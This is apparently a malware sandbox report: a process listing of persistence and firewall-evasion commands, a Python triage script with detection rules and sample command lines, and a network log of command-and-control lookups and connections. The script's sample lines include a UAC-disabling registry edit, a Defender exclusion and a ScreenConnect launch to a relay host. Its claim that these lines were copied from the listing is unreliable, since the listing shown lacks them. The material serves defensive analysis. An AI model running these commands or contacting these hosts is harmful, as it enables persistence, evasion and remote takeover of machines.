C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Users\Admin\AppData\Roaming\Network.exe

C:\Users\Admin\AppData\Roaming\Network.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vaS5Lj59HSh3.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9PZb2XeKo2Ov.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UvCM9DTMx1PL.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NHugTaed4e2t.bat" "

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe

"C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe"

C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe

"C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hhjzBeMnS37F.bat" "

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\TEMP\{68F3F38E-816C-4A8A-9520-9E1A6A21E496}\.ba\msn.exe

C:\Windows\TEMP\{68F3F38E-816C-4A8A-9520-9E1A6A21E496}\.ba\msn.exe

C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe

C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZDT8T7iTruRo.bat" "

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\plRuUThQ7DUV.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Xxys2Xb0KHAy.bat" "

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\cmd.exe

cmd /c md 634977

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\SysWOW64\extrac32.exe

extrac32 /Y /E Gtk

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8CcSCQtjZT2g.bat" "

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Y0xNmMCFk8yV.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\SysWOW64\findstr.exe

findstr /V "Constitution" Wagon

C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe

"C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe

"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe

"C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe

"C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe

"C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe

"C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\X54ekAcmKbIv.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gubQos3ySnWn.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HtYfsW3vai5h.bat" "

C:\Windows\system32\chcp.com

chcp 65001
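
The process listing above is raw sandbox output, so the following triage script was added by the editor; it is not part of the report and not the sandbox's own tooling. It runs a small set of rule-based detections over the recorded command lines (UAC disabled through EnableLUA=0, schtasks persistence at highest run level, netsh firewall allow rules, Defender exclusions, a copy into the Startup folder, findstr against AV process names, a system binary name under a user-writable path, a ScreenConnect client launch) and pulls the relay host, port and session parameters out of the ScreenConnect launch string. The rule set and its ATT&CK mappings are the editor's choices. The meaning of the ScreenConnect query fields (h = relay host, p = port, s = session ID, k = server public key, repeated c = custom properties) is the editor's reading of the observed string and should be checked against the vendor's client documentation. The sample command lines are copied from the listing above, with one benign control added, so the script runs offline.

```python
import re
from urllib.parse import parse_qs

# Constructed sample: command lines copied verbatim from the process listing
# above, plus one benign control ("tasklist") so the script runs offline.
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f",
    r'''"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f''',
    r'''"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"''',
    r'''netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE''',
    r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'""",
    r'''"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force''',
    r'''findstr /I "opssvc wrsa"''',
    r'''"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"''',
    r"tasklist",
    r'''"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=a205822a-25dd-4182-ae48-34f1f8dfcbcd&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c="''',
]

# Rules: (label, ATT&CK technique, pattern). Labels and mappings are the
# editor's, keyed on the exact operators this sample used.
RULES = [
    ("uac_disabled_enablelua", "T1548.002",
     re.compile(r"(?i)reg(\.exe)?\s+add\s+.*Policies\\System.*EnableLUA.*/d\s+0")),
    ("schtasks_persistence", "T1053.005",
     re.compile(r'(?i)schtasks(\.exe)?"?\s+/create\b')),
    ("firewall_allow_program", "T1562.004",
     re.compile(r"(?i)netsh\s+(adv)?firewall\s+add\s+allowedprogram")),
    ("defender_exclusion", "T1562.001",
     re.compile(r"(?i)Add-MpPreference\s+-Exclusion(Path|Process|Extension)")),
    ("startup_folder_copy", "T1547.001",
     re.compile(r"(?i)Copy-Item\s+.*\\Start Menu\\Programs\\Startup\\")),
    ("av_process_discovery", "T1518.001",
     re.compile(r'(?i)findstr\s+(/\S+\s+)*"?(opssvc|wrsa|AvastUI|AVGUI|bdservicehost|nsWscSvc|ekrn|SophosHealth)\b')),
    ("system_binary_name_in_user_path", "T1036.005",
     re.compile(r"(?i)\\(AppData|ProgramData)\\.*\\(svchost|csrss|lsass|winlogon|explorer)\.exe")),
    ("screenconnect_client_launch", "T1219",
     re.compile(r'(?i)ScreenConnect\.ClientService\.exe"?\s+"\?e=')),
]


def classify(cmdline):
    """Return sorted (label, technique) pairs for every rule that matches."""
    return sorted((label, tech) for label, tech, pat in RULES if pat.search(cmdline))


def parse_screenconnect_args(cmdline):
    """Extract the relay parameters a ScreenConnect client was launched with.

    The client takes one query-string style argument. Field meanings below are
    the editor's reading: h = relay host, p = port, e = session type,
    s = session ID, k = server public key, repeated c = custom properties.
    Returns {} when the command line carries no such argument.
    """
    m = re.search(r'"\?([^"]*)"', cmdline)
    if not m:
        return {}
    q = parse_qs(m.group(1))  # blank c= values are dropped by default
    return {
        "session_type": q.get("e", [""])[0],
        "relay_host": q.get("h", [""])[0],
        "relay_port": int(q["p"][0]) if q.get("p") else None,
        "session_id": q.get("s", [""])[0],
        "custom_properties": q.get("c", []),
        "server_key_present": bool(q.get("k")),
        "raw_fields": sorted(q),
    }


def triage(cmdlines):
    """Map each suspicious command line to its labels and any ScreenConnect relay."""
    hits = {}
    for line in cmdlines:
        labels, relay = classify(line), parse_screenconnect_args(line)
        if labels or relay:
            hits[line] = {"labels": labels, "screenconnect": relay}
    return hits


def techniques_seen(cmdlines):
    """Distinct ATT&CK technique IDs observed across a process-tree export."""
    return sorted({tech for line in cmdlines for _, tech in classify(line)})


if __name__ == "__main__":
    for line, info in triage(SAMPLE_CMDLINES).items():
        print(line[:80], "->", info["labels"] or info["screenconnect"])
    print("techniques:", ", ".join(techniques_seen(SAMPLE_CMDLINES)))
```

classify() is meant to be pointed at a full process-tree export, one command line per element; run the file directly to see the per-line labels and the technique summary for the sample. The rules are deliberately narrow and will need widening before reuse on other reports. Two persistence entries in this tree deserve a second look regardless of the rules: the tasks pointing at C:\Windows\system32\dll32\msinfo32.exe and C:\Windows\system32\Windows Shell Interactive.exe target a directory only an elevated process can write, so the parent chain of those schtasks calls should be checked against the EnableLUA change recorded earlier in the listing.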

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.130.49:443 urlhaus.abuse.ch tcp
DE 5.252.155.72:80 5.252.155.72 tcp
US 151.101.130.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 167.173.78.104.in-addr.arpa udp
US 8.8.8.8:53 49.130.101.151.in-addr.arpa udp
DE 185.208.159.240:8080 185.208.159.240 tcp
DE 185.208.159.240:8080 185.208.159.240 tcp
US 8.8.8.8:53 240.159.208.185.in-addr.arpa udp
US 8.8.8.8:53 72.155.252.5.in-addr.arpa udp
US 8.8.8.8:53 maerchen-beat-frei.ch udp
US 45.42.212.91:443 maerchen-beat-frei.ch tcp
CH 95.183.50.117:80 95.183.50.117 tcp
US 8.8.8.8:53 91.212.42.45.in-addr.arpa udp
US 8.8.8.8:53 117.50.183.95.in-addr.arpa udp
DE 185.208.159.240:56001 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 fizzysu.sbs udp
DE 5.75.209.106:443 fizzysu.sbs tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 106.209.75.5.in-addr.arpa udp
TR 45.138.183.226:80 45.138.183.226 tcp
DE 5.75.209.106:443 fizzysu.sbs tcp
US 8.8.8.8:53 plunder.dedyn.io udp
TR 216.9.224.66:5000 plunder.dedyn.io tcp
HK 121.127.231.166:80 121.127.231.166 tcp
US 8.8.8.8:53 226.183.138.45.in-addr.arpa udp
US 8.8.8.8:53 66.224.9.216.in-addr.arpa udp
DE 5.75.209.106:443 fizzysu.sbs tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 166.231.127.121.in-addr.arpa udp
TR 45.138.183.226:80 45.138.183.226 tcp
CN 124.221.100.215:80 tcp
CY 213.133.94.133:4444 tcp
TR 45.138.183.226:80 45.138.183.226 tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 88.221.134.89:80 e5.o.lencr.org tcp
DE 147.45.44.131:80 147.45.44.131 tcp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 89.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 131.44.45.147.in-addr.arpa udp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 8.8.8.8:53 bash.mywire.org udp
US 192.188.88.248:2404 bash.mywire.org tcp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 bash1.accesscam.org udp
US 192.188.88.248:2404 bash1.accesscam.org tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
JP 8.209.212.26:7777 8.209.212.26 tcp
US 8.8.8.8:53 26.212.209.8.in-addr.arpa udp
US 8.8.8.8:53 tuna91.duckdns.org udp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 8.8.8.8:53 bash2.accesscam.org udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
US 8.8.8.8:53 sulfux.ddns.net udp
FR 90.113.179.93:9033 sulfux.ddns.net tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
US 8.8.8.8:53 pastebin.com udp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 10.110.18.2.in-addr.arpa udp
US 8.8.8.8:53 xred.mooo.com udp
US 8.8.8.8:53 freedns.afraid.org udp
US 69.42.215.252:80 freedns.afraid.org tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
N/A 224.0.0.251:5353 udp
CN 120.26.164.174:8088 tcp
US 8.8.8.8:53 252.215.42.69.in-addr.arpa udp
US 8.8.8.8:53 20.49.80.91.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 mail.mindfulinvoice.online udp
US 199.127.63.127:8041 mail.mindfulinvoice.online tcp
US 8.8.8.8:53 127.63.127.199.in-addr.arpa udp
DE 147.45.44.131:80 147.45.44.131 tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 172.67.19.24:443 pastebin.com tcp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 207.231.111.48:80 207.231.111.48 tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 48.111.231.207.in-addr.arpa udp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 mim.no-ip.net udp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
RU 185.215.113.16:80 tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 adidya354-21806.portmap.host udp
FR 163.172.125.253:333 tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 mim.no-ip.net udp
US 172.67.19.24:443 pastebin.com tcp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
US 8.8.8.8:53 sulfux.ddns.net udp
FR 90.113.179.93:9033 sulfux.ddns.net tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 thefashionist.top udp
US 104.21.80.1:443 thefashionist.top tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 impolitewearr.biz udp
US 8.8.8.8:53 toppyneedus.biz udp
US 172.67.149.66:443 toppyneedus.biz tcp
US 8.8.8.8:53 1.80.21.104.in-addr.arpa udp
US 8.8.8.8:53 66.149.67.172.in-addr.arpa udp
FR 163.172.125.253:333 tcp
US 8.8.8.8:53 lightdeerysua.biz udp
US 8.8.8.8:53 suggestyuoz.biz udp
US 8.8.8.8:53 hoursuhouy.biz udp
US 8.8.8.8:53 mixedrecipew.biz udp
HK 45.192.96.63:6001 45.192.96.63 tcp
US 8.8.8.8:53 affordtempyo.biz udp
US 8.8.8.8:53 pleasedcfrown.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 yuriy-gagarin.com udp
US 8.8.8.8:53 dash4.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 104.21.82.94:443 yuriy-gagarin.com tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 63.96.192.45.in-addr.arpa udp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 94.82.21.104.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
DE 147.45.44.131:80 147.45.44.131 tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
RU 185.215.113.16:80 tcp
FR 163.172.125.253:333 tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 adidya354-21806.portmap.host udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 172.86.108.55:7771 tcp
RU 185.215.113.16:80 tcp
US 8.8.8.8:53 55.108.86.172.in-addr.arpa udp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 dash3.ddns.net udp
US 8.8.8.8:53 dash4.ddns.net udp
US 8.8.8.8:53 bash2.accesscam.org udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 172.67.19.24:443 pastebin.com tcp
FR 163.172.125.253:333 tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 mim.no-ip.net udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 sulfux.ddns.net udp
FR 90.113.179.93:9033 sulfux.ddns.net tcp
US 8.8.8.8:53 tuna91.duckdns.org udp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
FR 163.172.125.253:333 tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
